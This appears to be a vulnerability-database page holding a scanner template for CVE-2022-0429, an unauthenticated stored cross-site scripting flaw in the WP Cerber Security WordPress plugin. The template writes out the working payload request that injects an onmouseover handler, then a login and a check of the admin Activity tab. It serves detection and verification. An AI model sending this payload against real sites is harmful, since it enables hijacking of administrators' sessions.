| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2022-0429 | 7 Mar 202209:15 | – | attackerkb | |
| CVE-2022-0429 | 7 Sep 202518:58 | – | circl | |
| WordPress plugin WP Cerber Security, Anti-spam & Malware Scan 跨站脚本漏洞 | 7 Mar 202200:00 | – | cnnvd | |
| WordPress WP Cerber Security, Anti-spam & Malware Scan Plugin Cross-Site Scripting Vulnerabilities | 9 Mar 202200:00 | – | cnvd | |
| CVE-2022-0429 | 7 Mar 202208:16 | – | cve | |
| CVE-2022-0429 WP Cerber Security, Anti-spam & Malware Scan < 8.9.6 - Unauthenticated Stored Cross-Site Scripting | 7 Mar 202208:16 | – | cvelist | |
| EUVD-2022-15571 | 3 Oct 202520:07 | – | euvd | |
| CVE-2022-0429 | 7 Mar 202209:15 | – | nvd | |
| WordPress WP Cerber Security, Anti-spam & Malware Scan Plugin < 8.9.6 XSS Vulnerability | 22 Mar 202200:00 | – | openvas | |
| WordPress WP Cerber Security plugin <= 8.9.5 - Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability | 14 Feb 202200:00 | – | patchstack |
id: CVE-2022-0429
info:
name: WP Cerber Security, Anti-spam & Malware Scan < 8.9.6 - Cross-Site Scripting
author: s4e-io
severity: medium
description: |
The WP Cerber Security, Anti-spam & Malware Scan WordPress plugin before 8.9.6 does not sanitise the $url variable before using it in an attribute in the Activity tab in the plugins dashboard, leading to an unauthenticated stored Cross-Site Scripting vulnerability.
impact: |
Unauthenticated attackers can inject stored XSS payloads via unsanitized URL parameters, which execute when authenticated administrators view the Activity tab, potentially stealing session cookies or performing administrative actions.
remediation: |
Upgrade to WP Cerber Security version 8.9.6 or later.
reference:
- https://wpscan.com/vulnerability/d1b6f438-f737-4b18-89cf-161238a7421b/
- https://www.wiz.io/vulnerability-database/cve/cve-2022-0429
- https://nvd.nist.gov/vuln/detail/CVE-2022-0429
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0429
cwe-id: CWE-79
epss-score: 0.01378
epss-percentile: 0.68734
cpe: cpe:2.3:a:cerber:wp_cerber_security\,_anti-spam_\&_malware_scan:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: cerber
product: wp_cerber_security\,_anti-spam_\&_malware_scan
framework: wordpress
tags: cve,cve2022,wp,wp-plugin,wpscan,wordpress,xss,wp-cerber,authenticated,vkev,vuln
flow: http(1) && http(2)
http:
- raw: # send payload (unauth), content-length is required
- |
POST /"/onmouseover=alert(document.domain);// HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
a[b][c][d][e][f][g][h][i][j][k][l][m][n][o][p][q][r][s][t][u][v][w][x][y][z][1][2][3][4][5][6]=12345
unsafe: true
matchers:
- type: dsl
dsl:
- 'contains(body, "RID")'
- "status_code == 403"
condition: and
internal: true
- raw:
- | #check payload result (auth)
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=cerber-security&tab=activity HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '<wbr>/"<wbr>/onmouseover=alert(document.domain);<wbr>/<wbr>/</p>'
- type: status
status:
- 200
# digest: 4b0a00483046022100af8fc8abd4a9a906eb4983f8bdf47e4bffb03259bfd7417e6b5f926ab12a2f15022100b9ca57429b65a84b461a4e3415b4c1509c71429f9db157b7aee1f082455d0f83:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation